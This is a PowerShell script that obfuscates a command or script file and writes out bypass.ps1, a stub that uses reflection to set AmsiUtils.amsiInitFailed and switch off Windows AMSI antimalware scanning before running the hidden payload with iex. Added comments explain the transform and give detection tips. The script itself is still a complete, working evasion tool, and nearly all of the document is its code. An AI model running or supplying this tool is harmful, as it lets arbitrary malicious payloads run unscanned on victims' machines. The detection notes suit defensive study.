powershell-obfuscation.ps1
# Script parameters:
#   -c  a command string to encode
#   -f  a path to a script file whose contents are encoded
# The dispatch at the bottom of the script accepts exactly one of the two;
# any other combination prints the usage line.
param([string] $c,[string] $f)
# Encodes a byte array with a fixed, keyless transform.
#   $v : byte array to encode (callers pass ASCII bytes of the input text).
#   Returns the transformed byte array.
# Despite the name this is not encryption: each pass reverses the array and
# subtracts 3 from every byte, and the loop below runs three passes
# ($y = 9, 8, 7). The net effect is a reversed array with 9 subtracted from
# each byte, which anyone holding the output can undo without a secret.
function encrypt($v){
$y = 9
while($y -gt 6){
# Work on a copy so reads from $v are not affected by writes to $t.
[Byte[]]$t = $v.clone()
for ($x = 0; $x -lt $v.Count; $x++) {
# Mirror the index (reverse order) and shift the byte value down by 3.
$t[$v.Count-$x-1] = $v[$x] - 3
}
$v = $t
$y = $y - 1
}
return $v
}
# $text1 and $text2 are the head and tail of the script text that is written
# to bypass.ps1; the Base64 of the encoded input is placed between them.
# Backtick-escaped `$ keeps the variables literal in the emitted file.
$text1="[Byte[]]`$c = [System.Convert]::FromBase64String('"
# What the emitted stub does when run, as visible in the template below:
#   1. Base64-decodes three blobs: the payload ($c) and two fixed blobs ($d, $e).
#   2. Applies O() three times to each; O() reverses the array and adds 3 per
#      byte, i.e. the inverse of encrypt() in this file.
#   3. Uses reflection to look up a type named by $d, fetches its
#      'NonPublic,Static' field named by $e, and sets that field to $true.
#   4. Passes the decoded payload text to iex.
# Undoing the transform on the two fixed blobs yields
# System.Management.Automation.AmsiUtils and amsiInitFailed, so step 3 turns
# off AMSI scanning for the process before step 4 runs.
# Detection note: those names never appear in clear text in the emitted file,
# so static string matching on bypass.ps1 will miss them. Better signals are
# the decoded script block content seen at execution time, and the pattern of
# GetType(...).GetField(..., 'NonPublic,Static').SetValue($null,$true)
# immediately followed by iex on a decoded byte array.
$text2="')
[Byte[]]`$d = [System.Convert]::FromBase64String('amNga0xgamQ4JWVmYGtYZGZrbDgla2VcZFxeWGVYRCVkXGtqcEo=')
[Byte[]]`$e = [System.Convert]::FromBase64String('W1xjYFg9a2BlQGBqZFg=')
function O (`$v){
[Byte[]]`$t = `$v.clone()
for (`$x = 0; `$x -lt `$v.Count; `$x++) {
`$t[`$v.Count-`$x-1] = `$v[`$x] + 3
}
return `$t
}
`$y = 9
while(`$y -gt 6){
`$c = O(`$c)
`$d = O(`$d)
`$e = O(`$e)
`$y = `$y - 1
}
[Ref].Assembly.GetType([System.Text.Encoding]::ASCII.GetString(`$d)).GetField([System.Text.Encoding]::ASCII.GetString(`$e),'NonPublic,Static').SetValue(`$null,`$true)
iex([System.Text.Encoding]::ASCII.GetString(`$c))"
# Entry point: exactly one of -c / -f must be supplied.
# Both branches encode the input as ASCII bytes, wrap the Base64 result in
# $text1/$text2, and write the combined text to bypass.ps1 in the current
# directory. A file with that fixed name appearing next to this script is
# therefore an on-disk artifact of a run.
If(![String]::IsNullOrEmpty($c) -and [String]::IsNullOrEmpty($f)){
# -c only: encode the command string directly.
$result = encrypt([System.Text.Encoding]::ASCII.GetBytes($c))
write-output ($text1 + [Convert]::ToBase64String($result) + $text2) | out-file -filepath bypass.ps1
Write-Host("[+] obfuscation result has been saved in bypass.ps1")
}elseif(![String]::IsNullOrEmpty($f) -and [String]::IsNullOrEmpty($c)){
# -f only: read the file line by line, re-joining lines with "`n".
# NOTE(review): the StreamReader is never closed or disposed in this block.
$stream = [System.IO.StreamReader]::new($f)
$file = ""
while( -not $stream.EndOfStream) {
$file = $file + $stream.ReadLine() + "`n"
}
$result = encrypt([System.Text.Encoding]::ASCII.GetBytes($file))
write-output ($text1 + [Convert]::ToBase64String($result) + $text2) | out-file -filepath bypass.ps1
Write-Host("[+] obfuscation result has been saved in bypass.ps1")
}else{
# Neither or both parameters given: print usage and do nothing else.
Write-Host("./powershell-obfuscation.ps1 [-c/-f] [command/filepath]")
}